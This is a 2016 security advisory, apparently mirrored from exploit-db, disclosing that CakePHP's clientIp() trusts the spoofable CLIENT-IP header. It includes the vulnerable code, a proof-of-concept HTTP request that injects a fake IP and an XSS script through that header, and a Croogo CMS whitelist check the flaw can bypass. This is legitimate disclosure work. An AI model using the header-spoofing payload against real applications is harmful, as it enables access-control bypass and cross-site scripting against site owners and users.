CakePHP Framework 3.2.4 – IP Spoofing

  • 作者: Dawid Golunski
    日期: 2016-05-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39813/
  • =============================================
    - Release date: 12.05.2016
    - Discovered by: Dawid Golunski
    - Severity: Medium
    =============================================
    
     
    I. VULNERABILITY
    -------------------------
    
    CakePHP Framework<= 3.2.4IP Spoofing Vulnerability
    		3.1.11
    		2.8.1
    		2.7.10
    		2.6.12
     
    II. BACKGROUND
    -------------------------
    
    - CakePHP Framework
    
    http://cakephp.org/
    
    "CakePHP makes building web applications simpler, faster and require less code. 
    
    CakePHP is a modern PHP 5.4+ framework with a flexible Database access layer 
    and a powerful scaffolding system that makes building both small and complex 
    systems a breeze. "
    
     
    III. INTRODUCTION
    -------------------------
    
    CakePHP Framework contains a vulnerability that allows to spoof the source IP 
    address. This can allow to bypass access control lists, or injection of 
    malicious data which, if treated as sanitized by an unaware CakePHP-based 
    application, can lead to other vulnerabilities such as SQL injection, XSS, 
    command injection etc.
    
    
    IV. DESCRIPTION
    -------------------------
     
    Both branches of CakePHP Framework (2.x, 3.x) contain a clientIp() method that
    allows to obtain the IP address of a client accessing a CakePHP-based 
    application. The is slightly different in each branch:
    
    CakePHP 2.x:
    
    ------[ Cake/Network/CakeRequest.php ]------
    
    public function clientIp($safe = true) {
    if (!$safe && env('HTTP_X_FORWARDED_FOR')) {
    $ipaddr = preg_replace('/(?:,.*)/', '', env('HTTP_X_FORWARDED_FOR'));
    } else {
    if (env('HTTP_CLIENT_IP')) {
    $ipaddr = env('HTTP_CLIENT_IP');
    } else {
    $ipaddr = env('REMOTE_ADDR');
    }
    }
    
    if (env('HTTP_CLIENTADDRESS')) {
    $tmpipaddr = env('HTTP_CLIENTADDRESS');
    
    if (!empty($tmpipaddr)) {
    $ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
    }
    }
    return trim($ipaddr);
    }
    
    --------------------------------------------
    
    
    CakePHP 3.x:
    
    ------[ cakephp/src/Network/Request.php ]------
    
    /**
     * Get the IP the client is using, or says they are using.
     *
     * @return string The client IP.
     */
    public function clientIp()
    {
    if ($this->trustProxy && $this->env('HTTP_X_FORWARDED_FOR')) {
    $ipaddr = preg_replace('/(?:,.*)/', '', $this->env('HTTP_X_FORWARDED_FOR'));
    } else {
    if ($this->env('HTTP_CLIENT_IP')) {
    $ipaddr = $this->env('HTTP_CLIENT_IP');
    } else {
    $ipaddr = $this->env('REMOTE_ADDR');
    }
    }
    
    if ($this->env('HTTP_CLIENTADDRESS')) {
    $tmpipaddr = $this->env('HTTP_CLIENTADDRESS');
    
    if (!empty($tmpipaddr)) {
    $ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
    }
    }
    return trim($ipaddr);
    }
    
    --------------------------------------------
    
    
    Both of the methods contain the same vulnerability. Despite the safe flag 
    (CakePHP 2.x), and trustyProxy flag (CakePHP 3.x) set to off by default, they 
    both use HTTP_CLIENT_IP request header (if it exists) instead of the 
    REMOTE_ADDR variable set by the web server. 
    
    The HTTP_CLIENT_IP header can easily be spoofed by sending CLIENT-IP header
    in a HTTP request. 
    
     
    V. PROOF OF CONCEPT EXPLOIT
    -------------------------
     
    
    A) Simple PoC
    
    Download a vulnerable version of CakePHP framework and edit 
    src/Template/Pages/home.ctp to include the PoC code below
    which echoes the visitor's IP using the clientIp() method:
    
    
    -------[ src/Template/Pages/home.ctp ]--------
    
    <?php
    
    [...]
    
    use Cake\Cache\Cache;
    use Cake\Core\Configure;
    use Cake\Datasource\ConnectionManager;
    use Cake\Error\Debugger;
    use Cake\Network\Exception\NotFoundException;
    
    $this->layout = false;
    
    if (!Configure::read('debug')):
    throw new NotFoundException();
    endif;
    
    $cakeDescription = 'CakePHP: the rapid development php framework';
    
    echo "PoC \n<br> Your IP is: [". $this->request->clientIp() ."]\n\n<br><br>";
    
    [...]
    
    ?>
    
    ----------------------------------------------
    
    
    If we send the following request with CLIENT-IP header containing an arbitrary
    IP and malicious XSS data:
    
    
    GET /cake/cake3/ HTTP/1.1
    Host: centos
    CLIENT-IP: 100.200.300.400 <script>alert('poc');</script>
    Content-Length: 2
    
    
    the application will give the following response:
    
    
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=UTF-8
    
    PoC 
    <br> Your IP is: [100.200.300.400 <script>alert('poc');</script>]
    
    [...]
    
    
    As we can see the clientIp() method returns the fake IP and XSS payload
    from CLIENT-IP header.
    
    
    B) Croogo CMS exploit
    
    An example application vulnerable to this bug is Croogo CMS:
    
    https://croogo.org/
    
    "Croogo is a free, open source, content management system for PHP,
    released under The MIT License. It is powered by CakePHP MVC framework.
    It was first released on October 07, 2009"
    
    In one of its scripts we can find the isWhitelistedRequest() which
    takes care of ACLs:
    
    
    -------[ Vendor/croogo/croogo/Croogo/Lib/CroogoRouter.php ]--------
    
    
    /**
     * Check wether request is from a whitelisted IP address
     *
     * @see CakeRequest::addDetector()
     * @param $request CakeRequest Request object
     * @return boolean True when request is from a whitelisted IP Address
     */
    public static function isWhitelistedRequest(CakeRequest $request) {
    if (!$request) {
    return false;
    }
    $clientIp = $request->clientIp();
    $whitelist = array_map(
    'trim',
    (array)explode(',', Configure::read('Site.ipWhitelist'))
    );
    return in_array($clientIp, $whitelist);
    }
    
    -------------------------------------------------------------------
    
    As we can see, it uses the affected clientIp() function from CakePHP framework.
    
    
    VI. BUSINESS IMPACT
    -------------------------
    
    This vulnerability could be used to bypass access control lists to get
    access to sensitive data, or lead to higher severity vulnerabilities
    if untrusted data returned by clientIp() method is treated as safe and used
    without appropriate sanitization within SQL queries, system command calls etc.
     
    VII. SYSTEMS AFFECTED
    -------------------------
    
    According to the vendor, the following versions of CakePHP framework should be
    affected by this issue.
    
    3.1.11
    3.2.4
    2.8.1
    2.7.10
    2.6.12
    
     
    VIII. SOLUTION
    -------------------------
    
    The vendor has released patched versions.
    Install the latest version from the link below.
     
    IX. REFERENCES
    -------------------------
    
    http://legalhackers.com
    
    http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt
    
    Vendor security CakePHP releases:
    http://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html
    
    http://book.cakephp.org/3.0/en/controllers/request-response.html#working-with-http-methods-headers
    
    
    X. CREDITS
    -------------------------
    
    The vulnerability has been discovered by Dawid Golunski
    dawid (at) legalhackers (dot) com
    http://legalhackers.com
     
    XI. REVISION HISTORY
    -------------------------
    
    12.05.2016 - Final advisory released
     
    XII. LEGAL NOTICES
    -------------------------
    
    The information contained within this advisory is supplied "as-is" with
    no warranties or guarantees of fitness of use or otherwise. I accept no
    responsibility for any damage caused by the use or misuse of this information.